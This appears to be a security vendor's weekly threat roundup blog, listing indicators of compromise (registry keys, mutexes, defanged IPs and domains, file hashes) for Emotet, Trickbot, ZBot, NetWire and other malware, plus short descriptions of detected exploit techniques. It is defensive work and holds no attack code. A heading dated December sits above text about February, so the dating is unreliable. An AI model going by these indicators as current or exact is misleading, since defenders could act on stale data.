[Umbrella detection screenshot](<https://1.bp.blogspot.com/-2_OrUR0VFSA/Xf0G85OlwaI/AAAAAAAADEo/ZKVdId7_TMonOi-VQdzTDEY66dqP-7xYQCLcBGAsYHQ/s1600/17133d42590782a30f8464c7446d6a202299daf3cf8391ea40883d17e9d367ed_umbrella.png>)

* * *

### Win.Trojan.HawkEye-7455512-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED` Value Name: `Hidden` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Windows Update` | 6
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Registry Key Name` | 1

Mutexes | Occurrences
---|---
`3749282D282E1E80C56CAE5A` | 6

IP Addresses contacted by malware (does not indicate maliciousness), Domain Names contacted by malware (does not indicate maliciousness), Files and or directories created: *See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-0lOO8svNQCc/Xf0HNsu1BVI/AAAAAAAADE0/cEnYTdm-GvYd497LTV26dCFzGfN1gyLAQCLcBGAsYHQ/s1600/c79783e0d3330fc51bcc92714e8663234c7443ad9245046a5072685c9fa6a86f_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-zVXfjiXuTtI/Xf0HSvMiBxI/AAAAAAAADE4/0Len_QlrcxIhiuvcxj1rljBRIaKkPcWngCLcBGAsYHQ/s1600/c24a1e52447710a56f0e1de99401197fd2abebaa15c18de7aa0fa9548d7b15c5_tg.png>)

#### Umbrella

[Umbrella detection screenshot](<https://1.bp.blogspot.com/-e66AbVVWUzg/Xf0HZb0n9NI/AAAAAAAADE8/y_aUoYiSo8oFBSFte64rbW8HUVoatJ9SQCLcBGAsYHQ/s1600/75f3b9c29533c3b67b040a211d9acc2860ce3f224200d5985b69319210478fb4_umbrella.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (24210)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Process hollowing detected - (295)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Kovter injection detected - (161)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Gamarue malware detected - (143)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Installcore adware detected - (112)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.

Dealply adware detected - (98)
DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Excessively long PowerShell command detected - (89)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Special Search Offer adware - (45)
Special Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.

Reverse http payload detected - (26)
An exploit payload intended to connect back to an attacker-controlled host using HTTP has been detected.

Corebot malware detected - (25)
Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system that enables it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

Threat Roundup for December 13 to December 20 (Talos blog, published 2019-12-20; CVE list: CVE-2019-0708, CVSS 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C; <http://feedproxy.google.com/~r/feedburner/Talos/~3/gN121cJK8cQ/threat-roundup-1213-1220.html>)

* * *

[Threat Roundup header image](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 7 and Feb. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>).

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Doc.Downloader.Emotet-7580217-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.ZBot-7578445-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Dropper.Trickbot-7582953-1 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.NetWire-7578556-0 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Gamarue-7580018-0 | Packed | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud.
Win.Trojan.Kovter-7581113-1 | Trojan | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
PUA.Win.Trojan.Bladabindi-7581164-0 | Trojan | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone.
Win.Packed.Ponystealer-7581286-0 | Packed | Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT).
Win.Ransomware.Cerber-7582361-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
* * *

## Threat Breakdown

### Doc.Downloader.Emotet-7580217-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13` (Value Name: Blob) | 20
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: Type) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: Start) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: ErrorControl) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: ImagePath) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: DisplayName) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: WOW64) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: ObjectName) | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (Value Name: Description) | 5
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER` (Value Name: c019706b) | 2

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 18
`Global\M98B68E3C` | 18
`Global\IC019706B` | 2
`Global\MC019706B` | 2

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`67[.]195[.]228[.]95` | 3
`157[.]7[.]107[.]4` | 4
`190[.]228[.]29[.]115` | 3
`208[.]84[.]244[.]49` | 4
`105[.]187[.]200[.]240` | 4
`23[.]227[.]38[.]32` | 3
`72[.]18[.]130[.]169` | 3
`69[.]175[.]10[.]34` | 3
`83[.]143[.]28[.]130` | 4
`5[.]2[.]81[.]171` | 3
`41[.]191[.]232[.]22` | 4
`23[.]21[.]177[.]74` | 3
`89[.]97[.]236[.]171` | 3
`190[.]196[.]217[.]50` | 3
`195[.]57[.]58[.]70` | 4
`206[.]183[.]111[.]62` | 3
`192[.]185[.]181[.]168` | 4
`77[.]88[.]21[.]158` | 4
`87[.]250[.]255[.]212` | 3
`46[.]28[.]106[.]9` | 3
`77[.]88[.]21[.]37` | 3
`83[.]143[.]24[.]50` | 4
`86[.]96[.]229[.]28/31` | 3
`74[.]208[.]5[.]14/31` | 3
`173[.]194[.]204[.]108/31` | 4

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`smtp[.]outlook[.]com` | 3
`mail[.]outlook[.]com` | 3
`smtp[.]secureserver[.]net` | 4
`mailv[.]emirates[.]net[.]ae` | 3
`pop-mail[.]outlook[.]com` | 3
`pop[.]secureserver[.]net` | 3
`mail[.]secureserver[.]net` | 3
`secure[.]emailsrvr[.]com` | 3
`pop[.]yandex[.]com[.]tr` | 3
`smtp-mail[.]outlook[.]com` | 3
`outlook[.]office365[.]com` | 3
`mail[.]telkomsa[.]net` | 4
`smtp[.]yandex[.]com[.]tr` | 4
`mail[.]yandex[.]com` | 3
`mail[.]municipiodeyaguachi[.]gob[.]ec` | 3
`pop[.]vbn[.]co[.]bw` | 4
`mail[.]in[.]cpm-int[.]com` | 3
`mail[.]siajewellery[.]com` | 3
`mail[.]firstgourmet[.]com` | 3
`mail[.]lolipop[.]jp` | 3
`pop3[.]lolipop[.]jp` | 3
`mail[.]doves[.]co[.]za` | 3
`mail[.]vbn[.]co[.]bw` | 4
`smtp[.]vbn[.]co[.]bw` | 3
`mail[.]domverconsultants[.]com` | 3

*See JSON for more IOCs

Files and/or directories created | Occurrences
---|---
`%HOMEPATH%\298.exe` | 20
`%SystemRoot%\SysWOW64\AppIdPolicyEngineApi` | 1
`%SystemRoot%\SysWOW64\msctf` | 1
`%SystemRoot%\SysWOW64\cipher` | 1
`%SystemRoot%\SysWOW64\msftedit` | 1
`%SystemRoot%\SysWOW64\iprtrmgr` | 1
`%SystemRoot%\SysWOW64\xpsservices` | 1
`%SystemRoot%\SysWOW64\uexfat` | 1
`%ProgramData%\UmCbkT.exe` | 1
`%SystemRoot%\SysWOW64\dhcpcmonitor` | 1
`%SystemRoot%\SysWOW64\psbase` | 1
`%SystemRoot%\SysWOW64\f3ahvoas` | 1
`%SystemRoot%\SysWOW64\XpsRasterService` | 1
`%SystemRoot%\SysWOW64\NlsData0414` | 1
`%SystemRoot%\SysWOW64\rnr20` | 1
`%SystemRoot%\SysWOW64\KBDIULAT` | 1
`%SystemRoot%\SysWOW64\KBDHE` | 1
`%TEMP%\1A19.tmp` | 1
`%SystemRoot%\SysWOW64\dhcpcore` | 1
`%TEMP%\2D63.tmp` | 1
`%SystemRoot%\SysWOW64\mydocs` | 1
`%SystemRoot%\SysWOW64\wininet` | 1
`%SystemRoot%\SysWOW64\twinui` | 1
`%SystemRoot%\SysWOW64\ureg` | 1

#### File Hashes

```
0031f41b3edde21592bc42365e01689f23a73a634d7c8ffc0807e60e1a189a38
006766d9879f75d74de2c385ce8418fb838989af2046d8d329ad6ae7dc6d26eb
00efa3f945cfd76037639b91f2fd9208525eb377235440544c29e2c0d93a1c19
012b10d254c825b01bb0ae5f604bc59de7c0cac54bdd17b7f7dcd3e63ce89c66
024b77f2ff26f37e132e450a1d9a04fb94be78ecb0459afc5a09638efbec7cc5
02f55988f95d388efd2da064560eb349eab243dfc8eb806273850d707d74cb07
05c41c7550b30e8074e29985b3d4a75c209156334b93647f1e5d56a77cffc4f2
06a35e532b1e957c8fc2d44c2c370769fcc829479d90cb342b59dd7be17f58a1
0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b
0b878e218014a87bc4674a3f8c7113b207cf3e3203ba565c9e3fcf62cb5f18d6
0d45faaf1c2a3cd60340c2d9436fa60571f024ce17cb29089a538b3294aa8a3f
15d9234eeea6f729bd2a36b17e5cc5de58baa05a3ce2258675dd2620e4c28fb1
18195f809af26a3950879186304039c5592a8514671bb32cd6d45d7bf3014e4a
18c98bca74464c6bbe992bcffa838b6224e42419eac19e69ca0da0514968ccd6
18d15aa6b4831299695ceb06dd8ad7398dc48729314ecc0219a75833cc693dd4
196e94c02598dfcfaaf2b62c410c7d64eea908cc19c3af922277e2f1c5f3320f
19c05a961a7babe4bf5ef5889e358ba0df4b790a0b73544d5961bfef2e7d3451
1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1
21739583fe20050c9ea0aab5c23843a68b3d000a658b72f3148a98e4c0ba330d
2576c16870fedf186a782acae71056a381f01efbdd0c7df30a36daf526072368
26c3ffa34af8692430389b2132228ac0ad44b4a9cb2cf0a3c736468bf1ad1c1e
294233e4170042ad9ca33b8e5a227fc3e4033be090a25953a2d0e013f06e0a52
31522d4b3a684be27b58cddf1bf17be3f5cb34d5fc6fac0baba7b5d1aaf28e73
37cc6b1c356b5e15dd0fffc7ca4b58c760f02795ed47cff09e0b314951337a99
380fed9a967852beba37e632a51fce2a08f1c8b3b48330851a1fd40ac6dd1b84
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-Kr_lhWjsnHc/XkbZhu7QZPI/AAAAAAAADRo/vKTi-82YNVQGvQD9whr9pi0XdMYh4TavACLcBGAsYHQ/s1600/1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-bs4E2rUzd_U/XkbjlVL9wHI/AAAAAAAADR0/fHbhDuyvOKgxS0kzjFLPEToFz2W8BPmmQCLcBGAsYHQ/s1600/929d633b1ce45a623bf4090c7fc7de3a9b4ef32febcbb4b2c1e4b3589a965538_tg.png>)

#### Umbrella

[Umbrella detection screenshot](<https://1.bp.blogspot.com/-j5fItW8khQM/XkbjrikkxzI/AAAAAAAADR4/vZs3fBvwVlEkaC5oFvNBAJLNQpb3RIsqQCLcBGAsYHQ/s1600/0d52884323396c99de2994a867ebe7ccb325a7a33a6ae3317f4290517232a3ed_umbrella.png>)

#### Malware

[Malware screenshot](<https://1.bp.blogspot.com/-iVZ0T5_U8iQ/XkbjyoFCH7I/AAAAAAAADR8/4P6m7lf034MouuYEH9GdYx30SXlc81-TgCLcBGAsYHQ/s1600/0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b_malware.png>)

* * *

### Win.Packed.ZBot-7578445-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS` (Value Name: LoadAppInit_DLLs) | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS` (Value Name: AppInit_DLLs) | 25

Files and/or directories created | Occurrences
---|---
`%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll` | 21
`%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe` | 21
`%SystemRoot%\Tasks\kylaxsk.job` | 21
`%System32%\Tasks\aybbmte` | 25
`%ProgramData%\Mozilla\thfirxd.exe` | 25
`%ProgramData%\Mozilla\lygbwac.dll` | 25

#### File Hashes

```
083229d33405150930a1d1cb416882532138571c5dc659afc9cd80c8770e62b8
0c3bd17a29727331d9381f47943c6950b9a01828a1f6337ba17ced510616fff6
156d95f97c320ce13dbbd675c1240447f207096eab813f0ca852c5bec63ee3b5
172985bcfe276d18762f3a0ac551d15f49885e956478bfcc08cf5524d326ea25
1965ff8d288665c76396b6029aeb1337972735a4610ba879cf7bd407fb2a8827
27fdacd8808b754d66dfafbff9e4fc2173a799a94c5251117fe17f3af1428c06
3dc7b1cc278e41b56b9cf23e4fc10a74ac2c62867beebdacaecb6ba8103f2679
3eb746e6a92be3a38280129157597eccdffa14b881667c4d42167d0fee7e9c36
41dbab1de30bba1ae12cd63c2fccee455f6ac304e8d8909b1e9a9c4df4894620
4e07f974bcd096ee7e4db358855054bad5de2d9f0ec7ab3e3ed4151a3be2f95c
59e9dfc13476d28583402405e503be73e433d16888c2485956634751b9ce525b
5a93627200929bd11b532a8ff6e1df06467af81e80a4aa967873c80cb7ed7c73
5ce641289dee052cf18a3b76b25d77a6fdfa11b794048d86ef31f32889cc8da5
633d2684a78baf37a289ba913060b65c06d47dbe96c91b79cfbf9042cf8353a5
67d7bd9279e73e5563afe27e0145ca66df510167af85cc56fe4172fb6da6f838
79e2d39c6357dc3a3b057f05d0f53bdbaf1e51db61dfde985bee7bc1e05ed33c
7b344ba74f11fe719b8321da501d86598ab43fdf6a662ee1aafe6cd829add6e1
7ceaa69cbffcffefdea99f110c7b031439b0ea8d9caa7f475f117c975989f65b
834fc5e70088fac0e7df245b20ca3319d692763ff28b6407e835cd38a8a4403b
84d61f9eecf8973c0f9815faaff6b676857d0c0065e584b48ba31f8985923317
87db422f9fdc1a6266e78fcf69d9339f5dd2a55288ccf35ad3239da5a6a22d0e
8c43aafc29a44c7b54f5b228961737018b65c949288e170c598810505658cac5
8c754e7edf8a2aecb6d3fec2cbe7e07135fc74beb7aed0e7f3544cdc67266c44
94211619fcc8304b7dabd5d683ee525774c3d9ac34ec7809da2ae27eeb62c49a
a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-d6qrZYoKCdk/Xkbj_ntjiSI/AAAAAAAADSI/CW39wdcfw1s6Ko2RCER-1zBgGJIzq9YvQCLcBGAsYHQ/s1600/a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7_tg.png>)

* * *

### Win.Dropper.Trickbot-7582953-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13` (Value Name: Blob) | 3
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE` (Value Name: Blob) | 1

Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 29
`Global\785161C887210` | 25

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`216[.]239[.]32[.]21` | 1
`216[.]239[.]34[.]21` | 3
`216[.]239[.]36[.]21` | 2
`216[.]239[.]38[.]21` | 1
`104[.]20[.]17[.]242` | 1
`116[.]203[.]16[.]95` | 4
`50[.]19[.]116[.]122` | 1
`69[.]195[.]159[.]158` | 1
`190[.]214[.]13[.]2` | 14
`181[.]112[.]157[.]42` | 1
`181[.]113[.]28[.]146` | 1
`181[.]140[.]173[.]186` | 16
`119[.]252[.]165[.]75` | 1
`45[.]125[.]1[.]34` | 2
`54[.]235[.]203[.]7` | 1
`23[.]21[.]50[.]37` | 1
`198[.]8[.]91[.]10` | 3
`121[.]100[.]19[.]18` | 1
`171[.]100[.]142[.]238` | 1
`82[.]146[.]62[.]52` | 2
`5[.]182[.]210[.]246` | 2
`5[.]182[.]210[.]226` | 3
`51[.]89[.]115[.]116` | 5
`85[.]204[.]116[.]237` | 6
`93[.]189[.]42[.]146` | 7

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]myexternalip[.]com` | 1
`myexternalip[.]com` | 3
`icanhazip[.]com` | 1
`ip[.]anysrc[.]net` | 4
`api[.]ip[.]sb` | 2
`ipecho[.]net` | 2
`wtfismyip[.]com` | 1
`api[.]ipify[.]org` | 3
`ipinfo[.]io` | 2
`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 9

Files and/or directories created | Occurrences
---|---
`%APPDATA%\windirect` | 29
`%APPDATA%\windirect\settings.ini` | 29
`%APPDATA%\windirect\data` | 29
`%System32%\Tasks\Windows Direct core tools` | 29
`%SystemRoot%\Tasks\Windows Direct core tools.job` | 25
`%APPDATA%\windirect\bc434c1a3bd87c0cb40c31a3caac7831.exe` | 1
`%APPDATA%\windirect\7a2bd7d2423c2c83b3bc987c22da348c.exe` | 1
`%APPDATA%\windirect\a073a92c82bdad2dbdcba4bd1b322bdc.exe` | 1
`%APPDATA%\windirect\7baba02278378b0d739b212389d20c2c.exe` | 1
`%APPDATA%\WINDIRECT\<original file name>.exe` | 25

#### File Hashes

```
007e9d94f91258cdc60ba3fd7df1ed56b00c7c08ecff19c484343ce95978c096
068f1532a0c7e9f564e92f9b093f4cf4a534ef9aa6ee0e6ec6b992beba9404f1
09edeec6283a7986081aeaa4715321a383d675dbfbd2486d01b7e5c9fd81dfc6
0a324fcc5e761067096e9f2161ce3da69c0836972cda72e8740532cc7e84866a
0b19441ced2510b94d977feac51406e3e2a9b9b68f6e8df7a8710c9df29ec8d9
0fe8b3586aa6098767690b4ee1b1fbb39d047fcd7a929d2726f634365eacc6a8
13a865d3702b86db5c13bf6190a03da070ca23c094f8d3c2818ef788655b695b
14fa94928f23ccdb90400c7628327649543d9fd9dae6e963b8c1d96e0ebf7699
184c8d777fe98828143da4f2d762d094475a5eaa9018f77a97e8aad7d5cc696d
1ee8f3dec5556746589f417e1553a7c5f63eca1bab55d5ec95a96feb5ceb7c20
24ce27efe076795d16b9530988cf7b66df89b1f5e1c170a43c509f19b7ca1f94
2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac
29346d7f7895e449a9b09135e2c05deddfddbe9db62db4eb8d33f8f458b13e7a
2b30cd5e49572f0ec94855d7d64ebb4ccfb89c0e2ce0804010a36b892a0e2d3d
2bab0171d0bcbb1be86ef7ea26aa76a10155978a84c08214b156e837a024372a
34e46ae12096f2a6f3aa9ccc9d59cb94ff0ef151da405f056f43b3b2eb9781b5
3c4bad8514148748ac20c348ad75e47633ee2723db56fb993503719390eeca75
3d9acac16267698fb1f3ac47d0d05a2dda4c4758e9b36c9e1644f89e041556ba
42a29cd7a6ce5a5f864a99968f85e7cb4b8d22383b7e194cfd0d558e463c7b70
46cad7db43d81067d78055680a8434ccf1090e3afbc52654ba4dd905038c7a9a
492425d2ab26c3d88845c3d3ee8c13cd7bef8fc893ec71f61881bd1cde33f358
499a4b0530fcff51c3f8703e727ba8fee36c19229be9a650cd5b7dad1d184a79
4cca83ef698b44352c95dc6b05dbaa1eca0521454179932bb4d8094c01133bfb
4d2be228e84f31aade8e7be4c37e05921e3f94297b2a45fe7fa2ca61d5e8dfbd
4d678fc86bacc1f3c53f7b96c814710a5029306be44a90d32c482719ff308b45
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA |

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-hoGu7FGpsQo/XkbkN2mLU2I/AAAAAAAADSM/oZbkfOhd1rAp7EtlUP7a9Znu0opqCjgKACLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-FN8MIbTAUL4/XkbkRiFG4_I/AAAAAAAADSU/zw7YKnWdnf0WTlI6755e2LX-ngnp1d1TwCLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_tg.png>)

* * *

### Win.Dropper.NetWire-7578556-0

#### Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`88[.]198[.]117[.]83` | 25

#### File Hashes

```
05848831206819b63dabd2116e673d28de675e62cf7d858fa4764bfc7a1e9b40
1504dfb0c30dd51fed5c8940d5103479ae565fba3d839f7d973925fa868a6097
17e436f6312f5cb021419beabb8985272593995ccc09110f27abfee1d1eed74e
18bb29e7f9fcc8410d0e613a4989d47b5f1b38023c26bb95a4fe5ae53c2f52ff
1a996582f6a9e60acc72d4266067c9e5ff48ac32bdb45fc8787cc366ff4bd790
27540988f360e65aa1ca42007c551fb73ab1b36ed5408ff098389b6ce3ac0f94
27fb4531c6056a49b297b20a24eafaceabb954aeb24dc00813e85884e2d0a5ce
2ace0152ad8eb298bcae92ebcf3c27c09ed25620c59642be684886bffee56ccb
3c1c1ccf871e10907e69945363ada929b5841d4d192a8422745c47731d33bcfd
3efa7242e48e0be611c350de170776f8537fec4e7c0105ec86e44a18e95db367
46988782ad1012c66e2de02140c2f5d4f210916b0ace64d5c29018336ba76668
4b8c0fcde33aedb55f6e087fd9526699f188f3e3030e33bd04cd8785b748ebe1
4e9562ec338b3e4dbaca5f30289881689f5e4ca5ef7fffb4afe73abe040213b2
5609f2f063ee870c77bfb1e2912d7d5080f85755e069a67c94a6258bebe5f367
5f446e1da31fd31ec83cb6fa2b26da3ae2821ca60273152079736006f498841e
610007b784ce5e7ffa2a2e646e60c72277a0222b2f18fb74eed55d25f1af37dc
6253c1a4ebbfba5de561219996ddc45af59f4ca3b35a3f95354f5ae91c78bbe0
68a0b82d1b3a21dcbd78de0bdb31f69e4afdb4c20750929d9959af168aa4457d
74a0bc89f2667f79264105d44c751d625fbc53ce5a12771134b9c32ca9e916c9
74b44c73bf6f45344bb4aef9f469b3ca92b76b6c0e479e126cab0e35f679c9ca
7caee05382db7f0819893217db61a70cb249d1de1530fedf80e56a9fabc445d6
7e00eca478b68881e4722e2aba2094e468b4b457515d4b8e247b624189ecfc65
8851b44b9e92689115050278bef0261926ecda761a19a566a73fa29de08bad69
89c33a22731e48e90417e2877e318c86a7ac57b5d9ba4c9a39bc65bf27191935
8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A
#### Screenshots of Detection

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-komG9sMxszw/XkbkeNevidI/AAAAAAAADSc/kg9MJFg4Od4ZtqllEEqpWqFwGxDCzlNCgCLcBGAsYHQ/s1600/8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2_tg.png>)

* * *

### Win.Packed.Gamarue-7580018-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED` (Value Name: Hidden) | 11
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED` (Value Name: ShowSuperHidden) | 11
